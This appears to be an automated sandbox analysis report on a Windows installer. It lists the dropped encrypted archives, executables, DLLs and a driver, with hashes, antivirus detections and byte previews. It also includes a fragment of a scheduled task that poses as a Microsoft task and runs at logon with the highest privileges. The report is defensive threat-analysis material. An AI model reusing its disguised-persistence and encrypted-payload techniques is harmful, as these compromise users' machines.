                            Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):74960
                            Entropy (8bit):7.99759370165655
                            Encrypted:true
                            SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                            MD5:950338D50B95A25F494EE74E97B7B7A9
                            SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                            SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                            SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                            Malicious:false
                            Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                            Process:C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):74960
                            Entropy (8bit):7.997593701656546
                            Encrypted:true
                            SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                            MD5:059BA7C31F3E227356CA5F29E4AA2508
                            SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                            SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                            SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                            Malicious:false
                            Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):29730
                            Entropy (8bit):7.994290657653607
                            Encrypted:true
                            SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                            MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                            SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                            SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                            SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                            Malicious:false
                            Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                            Process:C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):29730
                            Entropy (8bit):7.994290657653608
                            Encrypted:true
                            SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                            MD5:A9C8A3E00692F79E1BA9693003F85D18
                            SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                            SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                            SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                            Malicious:false
                            Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                            Process:C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):2054096
                            Entropy (8bit):7.999911973951708
                            Encrypted:true
                            SSDEEP:49152:q2vqFHUMpJh0mjPzJvUUeSCWZbM00JoC/iZ7YHmwKm5OiRg/3btc:qVUMpskLJ00KLxiO/7g/3btc
                            MD5:D5A5A092107E0215609A9C71466EADAE
                            SHA1:50D6E1FB8CDE0E7F7131F12CAF2AD728274EE8FE
                            SHA-256:9007F916A0B68BBE7701F9940D8635E0A0F5E417F600AC875BDEDCEDDECA1F04
                            SHA-512:21F6575350F9840FFE4ED3A6F40EC584848FCD56D1ADD9FCAD527B54B097BCE5DF29F1B39DE709C632E1770C69D1D893BED53518B78AE64ADE9F36B3892B006D
                            Malicious:false
                            Preview:7z..'.....nVpW......@..........J).^G.......m.r..T..Y...s..z4z@..t.6 L.L..\.`..`.~2..M^.;....fnQ...fC.h.@aR....=.&...Se...#Y`..."6N.].0.....1.6s..S.......9..n.l.9.:.....#.....u!......^..........G....v..8....fVd..s..h..._.Q......y.A._g...CBXi~}[.6.Q@..T/..u....w=...n...".^5....#../H.M.|k..; d/d...H.8..,.l.{x^..!......Q.p......>..uU....;9....N..&+.....j.>5...K3..moC.r......J.X.7t...!|....pb.U&.U.mg...*..)....k.U......gr..%.\&V.....p..%\4.P..s....o.~.D..7qY.J...b.F.Gj.......ioV=.L".3-...-[=V`....B..d/p"..._..v?...,.i..d~...)...s.;.AG..m./qc.u.V.?LF...@..0..P.tn.....{I ./A-...5.~A..Z.$7......'y..W.!.x...`.X.......A.........W'D..=.J2^......{.....Y....\...<... ?..=(.;.?].>.....;...1.....U......y...Z...X.[...%.&..x..k.....!...._..\.L...`v.^...|.T..rA3h.....ff..[.o.....m.o........".O...I...KAj.<..u...[...R."..~.E.!...E..*#..f..}C...l.,4.._R.S;9......Zv...w.^...+.]s3.~.6....ih.a!U.S..<..[...G...N......s3..-.......Z.../...g....L[...h.oS.,..o1...1..
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):63640
                            Entropy (8bit):6.482810107683822
                            Encrypted:false
                            SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                            MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                            SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                            SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                            SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 9%
                            • Antivirus: Virustotal, Detection: 6%, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):4096
                            Entropy (8bit):3.3482223822620667
                            Encrypted:false
                            SSDEEP:48:dXKLzDln/L6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnewhldOVQOj6dKbKsz7
                            MD5:1E1D0466AB0FE8F2802587D337A10567
                            SHA1:362B3B6EFBE51EBD0702167061812CA567BB11BD
                            SHA-256:8B761FF2FDDF15A5E1AB4758D2112550B9A857F3B77F6A8EDC5F33586AEA06EC
                            SHA-512:4F37DAE32D421BB88B4C2B079461BE28F47343E84A1546519CC8107C2A842C16D14D736504457E4586BFB92E68B01D905BC3B45C4F68FA1FF6E87B41A9996809
                            Malicious:false
                            Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwo
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1803979
                            Entropy (8bit):7.999882930255694
                            Encrypted:true
                            SSDEEP:49152:ZU4rm4ToT3YZyQXl/kpD0EClXO9XQv5y9wNz:ZpCcJl/k6k9gvfNz
                            MD5:120881F751D8AC3C5ABE1FED5EFAD2AE
                            SHA1:DDB9BDACE6DE20213B844BE9E1FE67B475660455
                            SHA-256:30877048AFCE36333CEFC1E52079DDA43FEB7412F59B5AF132EBF2F3BB710D29
                            SHA-512:EE8B6E2A25F1F94D460502884C03F118DE8D08AB25C31ACEE987C0D16ED69910F4A1D6B785162FBAB5D4DB1AE09F556117C5895D9FDABC2BC766B324B9E54E41
                            Malicious:false
                            Preview:V.y.(.P.U..%...A{...&i.&..8.;...?....R.........*..o...r...*.r........F..~.5XoZ.4...$.. ..>n....[F..=.V...2M?.c.x..5...Y....".s.g.Y..F..3../Q.={!BO.Kz`.8\z...2.g..Z].ZY.};./.c..=.<Um{1...3.3(.....%4...a/.E3..5<..&..U.K;..yD5....d............g.;..8.......v?.Ib...v..J......W...?<.~w..&........c...H...R..vo.Da.3.H.".Y.8.q...B....l\R.D.L...J'G.... .f.K#..Q'.x.Wj....b..v...g..&.o@=.p..j.......h#.......r..!.....Ga.2..4.'f......{.a......D..m.i.+OiG...W.....B...>&..R_.(.ur.x..e....<.e...p.*....%..y4..j.....fP#....%.v.-..}...w......'. ..J.}..H..~!K.#..v4....EX.X3...>.o...0Hw^...t..X....+..S.F.5...E.la....d..R...D.-..hx6....'..PF....*).h....Qq..VU..~..Qi..c-.E.......V..c~N..X...OO.V.. H.....5U...[B.3..N?.0....#.....;.v....2.Y............f..A..v.Z.t:....n.v.UE.A.c.@.d..L.)...l...[....U.kw.B.l...S..E.......[..V..$C%..|KK..=..r..N*.t.G....&.].X.Q...:..k.........h..../N4...C$..t.V.x..t..p.......H@.....(.s8v..I...}`A...)f..%...._[.Z..#S.F..v|.I].....
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):1.1940658735648508
                            Encrypted:false
                            SSDEEP:3:Nlllul/nq/llh:NllUyt
                            MD5:AB80AD9A08E5B16132325DF5584B2CBE
                            SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                            SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                            SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                            Malicious:false
                            Preview:@...e................................................@..........
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3366912
                            Entropy (8bit):6.530564940970483
                            Encrypted:false
                            SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                            MD5:CC931C68EF6CB43932F2B21773072C73
                            SHA1:70E6A4F6482CC6006FF0F91A967FC5707B2F90C9
                            SHA-256:3707449B5CFF4A2360DA5BD55A06274C6F934B93BBEEFDF01956665DB3230AE0
                            SHA-512:924E79F925305B052B14D028EB26E9949F4188B293A35F6676BEED39D70CBF9CDBEE96F931FC44084CBB841416EDE807D465865EFCAA388D0C199573B32BEAA4
                            Malicious:true
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                            Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3366912
                            Entropy (8bit):6.530564940970483
                            Encrypted:false
                            SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                            MD5:CC931C68EF6CB43932F2B21773072C73
                            SHA1:70E6A4F6482CC6006FF0F91A967FC5707B2F90C9
                            SHA-256:3707449B5CFF4A2360DA5BD55A06274C6F934B93BBEEFDF01956665DB3230AE0
                            SHA-512:924E79F925305B052B14D028EB26E9949F4188B293A35F6676BEED39D70CBF9CDBEE96F931FC44084CBB841416EDE807D465865EFCAA388D0C199573B32BEAA4
                            Malicious:true
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                            Process:C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.720366600008286
                            Encrypted:false
                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606528
                            Entropy (8bit):7.005604268954487
                            Encrypted:false
                            SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                            MD5:1047AF726D2E233D71934EF55E635C4A
                            SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                            SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                            SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                            Malicious:true
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.720366600008286
                            Encrypted:false
                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606528
                            Entropy (8bit):7.005604268954487
                            Encrypted:false
                            SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                            MD5:1047AF726D2E233D71934EF55E635C4A
                            SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                            SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                            SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                            Malicious:true
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:ASCII text, with CRLF, CR line terminators
                            Category:dropped
                            Size (bytes):406
                            Entropy (8bit):5.117520345541057
                            Encrypted:false
                            SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                            MD5:9200058492BCA8F9D88B4877F842C148
                            SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                            SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                            SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                            Malicious:false
                            Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
